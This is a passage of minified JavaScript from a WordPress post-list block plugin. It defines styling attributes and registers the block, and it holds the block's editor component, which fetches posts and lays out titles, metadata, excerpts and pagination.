}"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!0},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},fullExcerptLg:{type:"boolean",default:!1},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptLimitLg:{type:"string",default:70,style:[{depends:[{key:"fullExcerptLg",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:0,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse; justify-content:flex-end; align-items:center; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"20",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"30"},style:[{selector:"{{ULTP}} .ultp-block-item:not(:first-child) { padding-bottom: {{septSpace}}px; } \n          {{ULTP}} .ultp-block-item:not(:first-child) { margin-bottom: {{septSpace}}px; }"}]},headingText:{type:"string",default:"Post List #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)s",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"metaTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",weight:"500",decoration:"none",family:""}},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{bottom:"15",unit:"px"},xs:{bottom:"5",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"0",bottom:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"catBgHoverColor",default:"var(--postx_preset_Base_2_color)"},{key:"catSacing",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},99038:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(42510),r=l(39220),s=l(95596);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-2/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-2.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist2.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-2","listBlocks")]},edit:n.Z,save:()=>null})},38602:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(40138);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(w.Ti),[A,H]=E(null),{setAttributes:N,name:j,clientId:Z,className:O,isSelected:R,context:D,attributes:z,attributes:{blockId:F,previewImg:W,readMoreIcon:V,imgCrop:G,excerptLimit:q,showFullExcerpt:$,columns:K,metaStyle:J,metaShow:Y,catShow:X,readMore:Q,readMoreText:ee,showImage:te,metaSeparator:le,titleShow:oe,catStyle:ae,catPosition:ie,titlePosition:ne,excerptShow:re,imgAnimation:se,imgOverlayType:pe,imgOverlay:ce,metaList:ue,varticalAlign:de,imgFlip:me,metaPosition:ge,layout:ye,customCatColor:be,onlyCatColor:ve,contentTag:he,titleTag:fe,showSeoMeta:ke,titleLength:we,metaMinText:xe,metaAuthorPrefix:Te,titleStyle:_e,metaDateFormat:Ce,authorLink:Ee,fallbackEnable:Se,vidIconEnable:Pe,notFoundMessage:Le,dcEnabled:Ie,dcFields:Be,advanceId:Ue,paginationShow:Me,paginationAjax:Ae,headingShow:He,filterShow:Ne,paginationType:je,navPosition:Ze,paginationNav:Oe,loadMoreText:Re,paginationText:De,V4_1_0_CompCheck:{runComp:ze},currentPostId:Fe}}=e;function We(e){M({...l,selectedDC:e})}function Ve(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),H("setting")}function qe(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function $e(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(z)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),$e()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,Fe,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[F]),C((()=>{const e=t.current;(0,h.o6)()&&0===z.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,z)&&($e(),t.current=z),e.isSelected!==R&&R&&(0,w.gT)(Ge,qe)):t.current=z}),[z]);const Ke={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:z,setSection:Ge,section:l.section,clientId:Z,context:D,setSelectedDc:We,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Je;F&&(Je=(0,y.Kh)(z,"ultimate-post/post-list-3",F,(0,a.k0)()));const Ye=_({...Ue&&{id:Ue},className:`ultp-block-${F} ${O}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:Ke,selected:l.toolbarSettings}),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}],exclude:["spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-list-3",key:"layout",options:[{img:"assets/img/layouts/pl3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pl3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[ze?"exclude":"dep"]:a.N2}],store:Ke}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:Ke})),(0,o.createElement)("div",Ye,Je&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Je}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(He||Ne||Me)&&(0,o.createElement)(r.m,{attributes:z,setAttributes:N,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const t=`${he}`,a=(e,t)=>(0,h.o6)()&&Ie&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Be,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:l.selectedDC,setSelectedDc:We,setAttributes:N,dcFields:Be});return W&&!R?(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:W}):(C((()=>{R&&W&&N({previewImg:""})}),[e?.isSelected]),l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading….","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-block-column-${K.lg} ultp-block-content-${de} ultp-block-content-${me} ultp-${ye}`},l.postsList.map(((e,l)=>{const r=JSON.parse(ue.replaceAll("u0022",'"'));return(0,o.createElement)(t,{key:l,className:`ultp-block-item ultp-block-media post-id-${e.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)(s._g,{imgOverlay:ce,imgOverlayType:pe,imgAnimation:se,post:e,fallbackEnable:Se,vidIconEnable:Pe,showImage:te,idx:l,imgCrop:G,onClick:()=>{Ge("image"),qe("image")},Video:Pe&&e.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Ge("video"),qe("video")}}):null,Category:"aboveTitle"!=ie?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:e,catShow:X,catStyle:ae,catPosition:ie,customCatColor:be,onlyCatColor:ve,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}})):null}),(0,o.createElement)("div",{className:"ultp-block-content"},a(7,e.ID),"aboveTitle"==ie&&(0,o.createElement)(i.Z,{post:e,catShow:X,catStyle:ae,catPosition:ie,customCatColor:be,onlyCatColor:ve,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),a(6,e.ID),e.title&&oe&&1==ne&&(0,o.createElement)(g.Z,{title:e.title,headingTag:fe,titleLength:we,titleStyle:_e,onClick:e=>{Ge("title"),qe("title")}}),a(5,e.ID),Y&&"top"==ge&&(0,o.createElement)(c.Z,{meta:r,post:e,metaSeparator:le,metaStyle:J,metaMinText:xe,metaAuthorPrefix:Te,metaDateFormat:Ce,authorLink:Ee,onClick:e=>{Ge("meta"),qe("meta")}}),a(4,e.ID),e.title&&oe&&0==ne&&(0,o.createElement)(g.Z,{title:e.title,headingTag:fe,titleLength:we,titleStyle:_e,onClick:e=>{Ge("title"),qe("title")}}),a(3,e.ID),re&&(0,o.createElement)(n.Z,{excerpt:e.excerpt,excerpt_full:e.excerpt_full,seo_meta:e.seo_meta,excerptLimit:q,showFullExcerpt:$,showSeoMeta:ke,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),a(2,e.ID),Q&&(0,o.createElement)(m.Z,{readMoreText:ee,readMoreIcon:V,titleLabel:e.title,onClick:()=>{Ge("read-more"),qe("read-more")}}),a(1,e.ID),Y&&"bottom"==ge&&(0,o.createElement)(c.Z,{meta:r,post:e,metaSeparator:le,metaStyle:J,metaMinText:xe,metaAuthorPrefix:Te,metaDateFormat:Ce,authorLink:Ee,onClick:e=>{Ge("meta"),qe("meta")}}),a(0,e.ID),(0,h.o6)()&&Ie&&(0,o.createElement)(f.Z,{dcFields:Be,setAttributes:N,startOnboarding:Ve}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Le}))}(),Me&&"loadMore"==je&&(0,o.createElement)(p.Z,{loadMoreText:Re,onClick:e=>{Ge("pagination"),qe("pagination")}}),Me&&"navigation"==je&&"topRight"!=Ze&&(0,o.createElement)(u.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}),Me&&"pagination"==je&&(0,o.createElement)(d.Z,{paginationNav:Oe,paginationAjax:Ae,paginationText:De,onClick:e=>{Ge("pagination"),qe("pagination")}}))))}},40138:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6838",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-3",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pl3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}],variation:{layout1:{imgWidth:{lg:"45",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout2:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout3:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"0",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"40",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"21",bottom:"21",left:"21",right:"21",unit:"px"}}},layout4:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"